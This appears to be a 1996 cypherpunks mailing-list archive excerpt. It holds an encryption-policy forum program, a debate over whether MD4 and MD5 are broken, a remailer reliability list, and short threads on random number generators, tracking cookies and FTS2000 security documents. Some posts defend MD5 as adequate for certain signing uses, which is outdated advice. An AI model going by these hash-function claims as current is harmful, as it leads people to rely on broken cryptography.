   * Location: Kresge Auditorium at Stanford University, Stanford,
     California
   * Date: July 1, 1996, 9:00 am - 3:00 pm

Program:

9:00 - 9:15       Welcome

    Rep. Anna Eshoo (D-Ca), co-host
    Rep. Tom Campbell (R-Ca), co-host
    Sen. Patrick Leahy (D-Vt) (by satellite)
    Jerry Berman, Center for Democracy and Technology

9:15 - 10:15      The Need for Locks and Keys on the GII:
                  An Encryption Overview

    Marc Andreessen, Netscape Communications
    Lori Fena, Electronic Frontier Foundation
    Eric Schmidt, Sun Microsystems
    Craig Mundie, Microsoft Corporation

10:15 - 10:30     Technology Demo: The Need for Locks & Keys
                  -- Packet Sniffing on the Internet (Cylink Corporation)

10:30 - 10:45     Break

10:45 - 11:45     How U.S. Encryption Policy Fails to Meet User Needs

    Herbert Lin, National Research Council
    Jim Omura, Cylink Corporation
    Tim Oren, CompuServe Incorporated
    Phil Zimmermann, PGP, Inc.
    Todd Lappin, Wired Magazine
          -- Introducing "Stories of Real-Life Encryption Users"

11:45 - 1:00      Lunch

1:00 - 1:45       The Cryptographers' Report: "Forty Bits Is Not Enough"

    Matt Blaze, AT&T
    Whitfield Diffie, Sun Microsystems
    Bruce Schneier, Counterpane Systems
    Eric Thompson, Access Data
    Tom Parenty, Sybase

    Technology Demo: The Genie is Out of the Bottle --
       A World Wide Web Tour of Good Cryptography Available Outside of
       the United States

1:45 - 2:45       Addressing Law Enforcement Concerns in a
                  Constitutional Framework

    Ken Bass, Venabel, Baetjer, Howard and Civiletti
    Cindy Cohn, McGlashan & Sarrail
    Michael Froomkin, University of Miami Law School
    John Gilmore, Electronic Frontier Foundation
    Grover Norquist, Americans for Tax Reform
    Nadine Strossen, American Civil Liberties Union
    Daniel Weitzner, Center for Democracy and Technology

2:45 - 3:00       Conclusion

Members of Congress expected to participate include:

   * Rep. Anna Eshoo (D-CA)
   * Rep. Tom Campbell (R-CA)
   * Rep. Zoe Lofgren (D-CA)
   * Sen. Conrad Burns (R-MT)
   * Sen. Patrick Leahy (D-VT) (by satellite)

---------------------------------------------------------------------------

Sponsors Of The SAFE Forum:

America Online
American Civil Liberties Union
Americans for Tax Reform
AT&T
Audionet
Business Software Alliance
Center for Democracy and Technology
Center for National Security Studies
Commercial Internet eXchange
CompuServe Incorporated
Computer and Communications Industry Association
Computer Professionals for Social Responsibility
Cylink Corporation
Digital Secured Networks Technology
EDS
Electronic Frontier Foundation
Electronic Messaging Association
Electronic Privacy Information Center
Information Technology Association of America
IEEE - USA
ManyMedia
MediaCast
Media Institute
Microsoft Corporation
National Association of Manufacturers
Netcom Online Communication Services
Netscape Communications Corporation
Novell, Inc.
Oracle Corporation
Pacific Telesis Group
Pretty Good Privacy, Inc.
Prodigy, Inc.
Progress and Freedom Foundation
Rent-a-Computer
Securities Industry Association
Software Publishers Association
Sun Microsystems, Inc.
Sybase, Inc.
Voters Telecommunications Watch
Wired Magazine
---------------------------------------------------------------------------

CORRECTION

An earlier Policy Post listed Matt Blaze with Lucent Technologies.  That
information was incorrect; he is with AT&T Research.
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Jul 1996 16:35:30 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: rsync and md4
In-Reply-To: <199607010408.AAA21171@darius.cris.com>
Message-ID: <199607010520.BAA19288@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> > I'm afraid you are totally wrong here. MD4 has been completely
> > broken. I wouldn't trust it for anything. In fact, MD5 is no longer
> > trustworthy, either -- it was broken recently. Stick to SHA.
> > 
> 
> Unless you are aware of some attack that I'm not, this is the most current 
> information on MD4 and MD5:
> 
> MD4 has had successful attacks on limited rounds.  It has _not_ been 
> completely cracked.

Could you please quit spewing inaccurate information?

Dobbertin completely cracked MD4 already, and found MD5 collisions in
a document circulated on May 2nd that mean it isn't far behind.

The comments you are making are dangerous because they encourage
people who don't know better to think that hashes which are known
unsafe are safe. Please quit posting until you start monitoring the
field enough to have accurate sources of information.

[...]
Forward from sci.crypt on 11 Jun 1996 14:22:03 GMT
  <dobbertin@skom.rhein.de> wrote (Re: "MD5 discussion"):

>In view of the continuing discussion about MD5, I want to make a few
>comments, which hopefully can help to avoid some misunderstandings
>and misinterpretations:

>1. In February 1996 my paper "Cryptanalysis of MD4" appeared (Fast
>Software Encryption, Cambridge Proceedings, Lecture Notes in Computer
>Sciences, vol. 1039, Springer-Verlag, 1996, pp. 71-82). In this
>paper, as an example two versions of a contract are given with the
>same MD4 hash value. Alf sells his house to Ann, in the first version
>the price is $176,495 and in the second it is $276,495. The contracts
>have been prepared by Alf. Now if Ann signs the first version with
>$176,495 then Alf can altered to price to $276.495 ...  In principle
>this risk occurs, if you use a hash function for which (senseful)
>collisions can be found, whenever you allow another person to have
>influence on the contents of a document you are signing.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Mon, 1 Jul 1996 17:43:51 +0800
To: ogren@cris.com
Subject: Re: rsync and md4
Message-ID: <199607010605.CAA24104@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> "David F. Ogren" writes:
> > > I'm afraid you are totally wrong here. MD4 has been completely
> > > broken. I wouldn't trust it for anything. In fact, MD5 is no longer
> > > trustworthy, either -- it was broken recently. Stick to SHA.
> > > 
> > 
> > MD4 has had successful attacks on limited rounds.  It has _not_ been 
> > completely cracked.
> 
> Could you please quit spewing inaccurate information?
> 
> Dobbertin completely cracked MD4 already, and found MD5 collisions in
> a document circulated on May 2nd that mean it isn't far behind.
> 
> The comments you are making are dangerous because they encourage
> people who don't know better to think that hashes which are known
> unsafe are safe. Please quit posting until you start monitoring the
> field enough to have accurate sources of information.
> 

I stand by my statements.  I have followed the current developments 
regarding MD5 with interest, and am using SHA1 in the program that I am 
currently authoring because of its MD5's weaknesses.

However, MD5 (and MD4) have not been completely cracked.  The problems that 
you bring up have to do with situations where an active attacker develops a 
slightly different pair of documents with the same hash.

Although this is highly undesirable characteristic for a hash function, and 
shows a weakness in the function that may eventually lead to its being 
completely cracked, it does not mean that a fraudulent document can be 
created from an already signed document.  This is an old argument and I 
don't want to get into it here.  However, there a lots of people that who 
still think MD5 can be safely used to a) sign documents that you create 
yourself, and b) sign documents that you have made cosmetic changes to.

Irregardless, this argument is moot.  This thread is titled "rsync and 
md4".  It is a discussion about which hash function suits this particular 
purpose and he is not particularly concerned with resistance to deliberate 
attack.  In this case MD4 will function adequately.
- --
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMddp3uSLhCBkWOspAQEI1Qf/VLg6ak6Y/VfbynFhCcA69RZKAQ/C6pCx
DMdz3OFitOwQM/csjTPBs7jue/3ArIQ+jevBOjp/NyAoJ4U8+Np4yv7ksmpEjTKq
EWq4DcvAB7MgpgJ72A92tO55vQo8AjYPmcZT2LhqeiTg+R6yL437T4gqS0ZSs7Ud
7e1anp7m72shSel6OKsxtfgiyVDlVi6mdtpXlLegWxcZhPaRYaZen3mHJ3JdxCpc
EsQupdrNVxBGMuxKeBwlkjCxD1TbqFpHTodh0oapEDScjpzTMmQeHYavmboI+Pys
32jt1PI9JEPIDracYcI3ovkgvR5VmMlKhAPDXcYbr2MWeBbVRDOaJw==
=9dqv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 2 Jul 1996 02:56:20 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199607011350.GAA27758@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 1 Jul 96 6:47:34 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
flame    remailer@flame.alias.net         +++++__.-++- 10:04:50 100.00%
alumni   hal@alumni.caltech.edu           #######*+*##     1:13 100.00%
ecafe    cpunk@remail.ecafe.org           ####*#+--##*    14:24  99.98%
replay   remailer@replay.com              *********+**     4:18  99.98%
nemesis  remailer@meaning.com                    +****    23:43  99.98%
c2       remail@c2.org                    ++++++++-+++    51:58  99.97%
portal   hfinney@shell.portal.com         +#######+*##     1:24  99.95%
haystack haystack@holy.cow.net            *-+#++++###+     9:25  99.94%
exon     remailer@remailer.nl.com         ++*******+**     5:49  99.94%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    39:16  99.94%
nymrod   nymrod@nym.jpunix.com            ** ****#+#-#    12:31  99.92%
mix      mixmaster@remail.obscura.com     __.-_.-.---  18:42:17  99.88%
treehole remailer@mockingbird.alias.net   +++ -..+++-+  5:28:11  99.24%
amnesia  amnesia@chardos.connix.com       -----------   4:20:06  99.22%
penet    anon@anon.penet.fi               __ _-.....   44:52:17  99.20%
extropia remail@miron.vip.best.com        --.--------   5:15:59  97.93%
ncognito ncognito@rigel.cyberpass.net     -.___.-._    22:24:17  97.35%
alpha    alias@alpha.c2.org               ******-+++**    38:56  96.99%
jam      remailer@cypherpunks.ca                     *    19:19  96.68%
lucifer  lucifer@dhp.com                         +++      56:06  95.20%
vegas    remailer@vegas.gateway.com       #**-#***        16:52  60.55%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 2 Jul 1996 03:03:35 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware RNG
Message-ID: <199607011504.IAA24410@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:23 AM 6/30/96 -0700, Timothy C. May wrote:
> While radioactive decay is unpredictable (so are a lot of things, by the
> way), there are all kinds of biases that reduce the apparent entropy.
> Detector "dead time" is a classic one (basically, the detector can't detect
> counts during a post-pulse recovery time...probably not a problem at low
> count rates, but an example of how subtle things can sneak in).

If he has more than eight bits of timing resolution, such biases will
have no affect.

He is using his non uniformly distributed random number to select a
uniformly distributed pseudo random number.

Provided that the does not attempt to get more entropy out than he
puts in, the result should be a uniformly distributed truly random
number.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 2 Jul 1996 01:14:24 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: rsync and md4
In-Reply-To: <199607010605.CAA24104@darius.cris.com>
Message-ID: <199607011320.JAA20895@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> I stand by my statements.

Then you have lost all your reputation with me. If you don't even have
the integrity to admit that you are wrong, you are obviously not a
reasonable source of information.

> However, MD5 (and MD4) have not been completely cracked.  The problems that 
> you bring up have to do with situations where an active attacker develops a 
> slightly different pair of documents with the same hash.

I believe that is "cracked" under most definitions of cryptographic
hashes, Mr. Ogren. A cryptographic hash is supposed to be useable in a
signature precisely because it is supposed to be computationally
infeasable to find two documents with the same hash. Whether both
documents are chosen by the attacker or only one is immaterial -- the
property as stated is independant of that. As things stand, you can
get someone to sign a contract saying "I agree to pay David F. Ogren
$100" and turn it into one saying "I agree to pay David F. Ogren
$2395.39" or some such. If that isn't "cracked" what would be
"cracked"? Yes, it could be worse, but is this not far more than bad
enough?

> Although this is highly undesirable characteristic for a hash function, and 
> shows a weakness in the function that may eventually lead to its being 
> completely cracked, it does not mean that a fraudulent document can be 
> created from an already signed document.

Whatever you like, Mr. Ogren.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Watt <watt@sware.com>
Date: Tue, 2 Jul 1996 03:29:35 +0800
To: perry@piermont.com
Subject: Re: rsync and md4
In-Reply-To: <199607011320.JAA20895@jekyll.piermont.com>
Message-ID: <9607011359.AA15838@mordred.sware.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIIBvzCCAWkCEFmOln6ip0w49CuyWr9vDVUwDQYJKoZIhvcNAQECBQAwWTELMAkG
 A1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2Vj
 dXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMB4XDTk1MDUwODIw
 MjMzNVoXDTk3MDUwNzIwMjMzNVowcDELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Nl
 Y3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsT
 DkVuZ2luZWVyaW5nIENBMRUwEwYDVQQDEwxDaGFybGVzIFdhdHQwWTAKBgRVCAEB
 AgICBANLADBIAkEM2ZSp7b6eqDqK5RbPFpd6DGSLjbpHOZU07pUcdgJXiduj9Ytf
 1rsmf/adaplQr+X5FeoIdT/bVSv2MUi3gY0eFwIDAQABMA0GCSqGSIb3DQEBAgUA
 A0EApEjzeBjiSnGImJXgeY1K8HWSufpJ2DpLBF7DYqqIVAX9H7gmfOJhfeGEYVjK
 aTxjgASxqHhzkx7PkOnL4JrN+Q==
MIC-Info: RSA-MD5,RSA,
 AUgiTVoKIzYpT3U2b5lxqGU6+uLTb+C+hivLsd0PxXH993pdEwRJ3rvJtAPSIacX
 +G7fosR46YQw+F9wxr955fI=

> "David F. Ogren" writes:
> > I stand by my statements.
> 
> Then you have lost all your reputation with me. If you don't even have
> the integrity to admit that you are wrong, you are obviously not a
> reasonable source of information.

How typically Perry.  

> 
> > However, MD5 (and MD4) have not been completely cracked.  The problems that 
> > you bring up have to do with situations where an active attacker develops a 
> > slightly different pair of documents with the same hash.
> 
> I believe that is "cracked" under most definitions of cryptographic
> hashes, Mr. Ogren. A cryptographic hash is supposed to be useable in a
> signature precisely because it is supposed to be computationally
> infeasable to find two documents with the same hash. Whether both
> documents are chosen by the attacker or only one is immaterial -- the
> property as stated is independant of that. As things stand, you can
> get someone to sign a contract saying "I agree to pay David F. Ogren
> $100" and turn it into one saying "I agree to pay David F. Ogren
> $2395.39" or some such. If that isn't "cracked" what would be
> "cracked"? Yes, it could be worse, but is this not far more than bad
> enough?
> 
> > Although this is highly undesirable characteristic for a hash function, and 
> > shows a weakness in the function that may eventually lead to its being 
> > completely cracked, it does not mean that a fraudulent document can be 
> > created from an already signed document.
> 
> Whatever you like, Mr. Ogren.
> 
> Perry

Perry, as you are so fond of quoting Dobbertin, let me forward once again to 
the list Hans' analysis of the "crack" that he discovered.  He explicitly 
agrees with Mr. Ogren's analysis.  Yes it is prudent to move away from MD5.
But there are still plenty of uses where it is more than sufficient.

Charlie Watt
SecureWare

- -----------------------------------------------------------------------

> Some of you may have seen this, but I think it's worth reposting here.
>   --Rob
> 
> Forward from sci.crypt on 11 Jun 1996 14:22:03 GMT
>   <dobbertin@skom.rhein.de> wrote (Re: "MD5 discussion"):
> 
> >In view of the continuing discussion about MD5, I want to make a few comments,
> >which hopefully can help to avoid some misunderstandings and misinterpretations:
> 
> >1. In February 1996 my paper "Cryptanalysis of MD4" appeared (Fast Software
> >Encryption, Cambridge Proceedings, Lecture Notes in Computer Sciences, 
> >vol. 1039, Springer-Verlag, 1996, pp. 71-82). In this paper, as an example two
> >versions of a contract are given with the same MD4 hash value. Alf sells his
> >house to Ann, in the first version the price is $176,495 and in the second it is
> >$276,495. The contracts have been prepared by Alf. Now if Ann signs the first
> >version with $176,495 then Alf can altered to price to $276.495 ...
> >In principle this risk occurs, if you use a hash function for which (senseful) collisions
> >can be found,  whenever you allow another person to have influence on the 
> >contents of a document you are signing. Certainly this does not happen
> >very often in practical applications. But sometimes you *must* have an agreement
> >about a text (contract) which is then signed by two or more parties. And these are
> >often just the most important applications!
> 
> >2. I suspect that the recent attack on MD5 compress can be refined and extended
> >such that it might lead to MD5 collisions (matching the right IV) and perhaps then
> >even to similar results as already obtained for MD4. Certainly this requires a lot of 
> >hard additional work.  
> 
> >3. If you write a message for your own (nobody else has influence on it) and sign
> >it using MD5 (and a strong public key algorithm, of course) then there is no danger 
> >that it can be altered (at least according to our knowledge today)! Thus it is true
> >that I guess almost all of you will have no risk using MD5, for instance in PGP.
> >However, if you accept 2., then in some cases there could be problems ... 
> 
> >4. After all I have reservations against keeping MD5 as a (de facto) standard, 
> >because 2. might indicate that there is a serious security problem with MD5.
> 
> >5. My conclusions are: no reason for panic, but in future implementations better
> >move away from MD5.
> 
> >6. Presently a paper discussion the status of MD5 in detail is in preparation.
> 
> >  -   Hans Dobbertin      
-----END PRIVACY-ENHANCED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 2 Jul 1996 02:25:19 +0800
To: Charles Watt <watt@sware.com>
Subject: Re: rsync and md4
In-Reply-To: <9607011359.AA15838@mordred.sware.com>
Message-ID: <199607011419.KAA20986@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Charles Watt writes:
> How typically Perry.  

Thank you for the compliment. I know that you think my comments are
evidence that I am nasty and that you think this is an insult, but my
clients seem to think this sort of thing is evidence that I'm
uncompromising in trying to maintain the security of their
systems. Everyone here knows my reputation. I may have a rough edge to
me, but people by now know that my advice is generally right on the
money. The fact that I have a reputation pleases me -- it does not
disturb me.

> Perry, as you are so fond of quoting Dobbertin, let me forward once again to 
> the list Hans' analysis of the "crack" that he discovered.  He explicitly 
> agrees with Mr. Ogren's analysis.

No, he doesn't. Dobbertin's privately circulated document is entitled
"Cryptanalysis of MD5", not "Possible weaknesses in MD5". The MD4
results were even more damning. It is true that the attacks aren't
general, but they are bad enough that the key property of
cryptographic hashes -- that it is computationally infeasable to
produce two documents with the same hash (note that the property is
NOT that you cannot produce a document with the same hash as a
document selected by the opponent), has been broken. Chosen plaintext,
in particular, is completely broken.

Dobbertin explicitly says that although there is no reason to panic,
that MD5 is not to be trusted.

I quote from your quote of Dobbertin:

      5. My conclusions are: no reason for panic, but in future
      implementations better move away from MD5.

> Yes it is prudent to move away from MD5.  But there are still plenty
> of uses where it is more than sufficient.

Yeah, like if you are looking for a wacky checksum and not a
cryptographic hash.

Look the point is that Ogren seems to think this is some sort of a
minor technicality and that we can safely ignore it most of the
time. Thats simply not prudent. Once you find that the key properties
of your cryptographic hash have fallen and you have to be
exceptionally careful about what you put through the hash lest an
attacker somehow influence it, you've lost the game. MD5 is no longer
trustworthy. I agree that one needn't run screaming in the streets,
but Ogren made it sound as though this wasn't a matter of
concern. Thats simply wrong. Saying that leads people to a completely
incorrect conclusion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Wyant <scott_wyant@loop.com>
Date: Tue, 2 Jul 1996 06:32:38 +0800
To: "Yanni" <jon@aggroup.com>
Subject: Re: [Fwd: Doubleclick]
Message-ID: <1.5.4.32.19960701172423.006cd9e8@pop.loop.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 PM 6/30/96 -0700, you wrote:

>  
>> > >Date:    Wed, 26 Jun 1996 19:42:00 -0700 
>> > >From:    Scott Wyant <scott_wyant@loop.com> Subject: COMMENT: 
>> > >Cookie dough 
>> > > 
>> > >If you're like me, you never went to a site called "doubleclick."  
>> > >So how did they give you a cookie?  After all, the idea of the 
>> > >cookie, according to the specs published by Netscape, is to make a 
>> > >more efficient connection between the server the delivers the 
>> > >cookie and the client machine which receives it. 
>> > >But we have never connected to "doubleclick." 
>
>Scott must have. Navigator is very picky about where a cookie comes 
>from and what is put in the domain field of the cookie.
>

Nope.  I'm afraid your information is incorrect here.  I've also watched
other sites hand me a double-click cookie.

And no, I don't work for "DoubleClick."  Interesting premise, though.
Scott Wyant
Spinoza Ltd.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 2 Jul 1996 03:21:51 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: FTS2000 Security Info and RFP
Message-ID: <Pine.SCO.3.93.960701103342.6401B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


The URL's for FTS2000 RFP, Security Policy data, and assorted sundries 
are:

http://post.fts2k.gsa.gov/
(the official government stuff)

http://204.70.134.242/policy/
(This appears to be an MCI server and I don't know if they know that this
stuff is online)

Enjoy.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Watt <watt@sware.com>
Date: Tue, 2 Jul 1996 03:54:39 +0800
To: perry@piermont.com
Subject: Re: rsync and md4
In-Reply-To: <199607011419.KAA20986@jekyll.piermont.com>
Message-ID: <9607011452.AA15989@mordred.sware.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIIBvzCCAWkCEFmOln6ip0w49CuyWr9vDVUwDQYJKoZIhvcNAQECBQAwWTELMAkG
 A1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2Vj
 dXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMB4XDTk1MDUwODIw
 MjMzNVoXDTk3MDUwNzIwMjMzNVowcDELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Nl
 Y3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsT
 DkVuZ2luZWVyaW5nIENBMRUwEwYDVQQDEwxDaGFybGVzIFdhdHQwWTAKBgRVCAEB
 AgICBANLADBIAkEM2ZSp7b6eqDqK5RbPFpd6DGSLjbpHOZU07pUcdgJXiduj9Ytf
 1rsmf/adaplQr+X5FeoIdT/bVSv2MUi3gY0eFwIDAQABMA0GCSqGSIb3DQEBAgUA
 A0EApEjzeBjiSnGImJXgeY1K8HWSufpJ2DpLBF7DYqqIVAX9H7gmfOJhfeGEYVjK
 aTxjgASxqHhzkx7PkOnL4JrN+Q==
MIC-Info: RSA-MD5,RSA,
 BmSwniu8gUasZa1TjPkW32wDQoVcczj8fKdr0iBciiZtHKyz1xXgeHgBI9V0oV8h
 dwcOLMC8bbAL39VVNkGHlxw=

> > Perry, as you are so fond of quoting Dobbertin, let me forward once again to 
> > the list Hans' analysis of the "crack" that he discovered.  He explicitly 
> > agrees with Mr. Ogren's analysis.
> 
> No, he doesn't. Dobbertin's privately circulated document is entitled
> "Cryptanalysis of MD5", not "Possible weaknesses in MD5". The MD4
> results were even more damning. It is true that the attacks aren't
> general, but they are bad enough that the key property of
> cryptographic hashes -- that it is computationally infeasable to
> produce two documents with the same hash (note that the property is
> NOT that you cannot produce a document with the same hash as a
> document selected by the opponent), has been broken. Chosen plaintext,
> in particular, is completely broken.
> 
> Dobbertin explicitly says that although there is no reason to panic,
> that MD5 is not to be trusted.
> 
> I quote from your quote of Dobbertin:
> 
>       5. My conclusions are: no reason for panic, but in future
>       implementations better move away from MD5.
> 
> > Yes it is prudent to move away from MD5.  But there are still plenty
> > of uses where it is more than sufficient.
> 
> Yeah, like if you are looking for a wacky checksum and not a
> cryptographic hash.
> 
> Look the point is that Ogren seems to think this is some sort of a
> minor technicality and that we can safely ignore it most of the
> time. Thats simply not prudent. Once you find that the key properties
> of your cryptographic hash have fallen and you have to be
> exceptionally careful about what you put through the hash lest an
> attacker somehow influence it, you've lost the game. MD5 is no longer
> trustworthy. I agree that one needn't run screaming in the streets,
> but Ogren made it sound as though this wasn't a matter of
> concern. Thats simply wrong. Saying that leads people to a completely
> incorrect conclusion.

I admit I am at a disadvantage having deleted the first few messages on this 
thread without actually reading them -- but when I am out one day and come 
back to 200+ cypherpunk messages of which perhaps 10 are relevant to 
cryptography, I get a little quick with the delete.  However, I am assuming
from the stated speed requirement that the original query was intended for 
just such a hashing scheme.  I interpretted Ogren's comments along the lines
of "choose an algorithm based upon a best fit for the requirements, where
security is just one of the requirements (although the most important)" 
(quotes used to indicate paraphrasing rather than actual quote).  If these
assumptions are valid, then he is quite correct, for a blanket condemnation
of MD5 is unwarranted.  If the intended application is for use with 
signatures, then I too would be quite leary of MD5 -- but only if I am
signing a document that I did not originate OR I need to ensure the
validity of the signature for longer than 12 months.  Condemning an 
application of MD5 without understanding the specific requirements placed 
upon the hashing algorithm is unjustified.  Complacently accepting the 
strength of the algorithm for all applications based upon recent findings 
is foolish.

Charles Watt
SecureWare

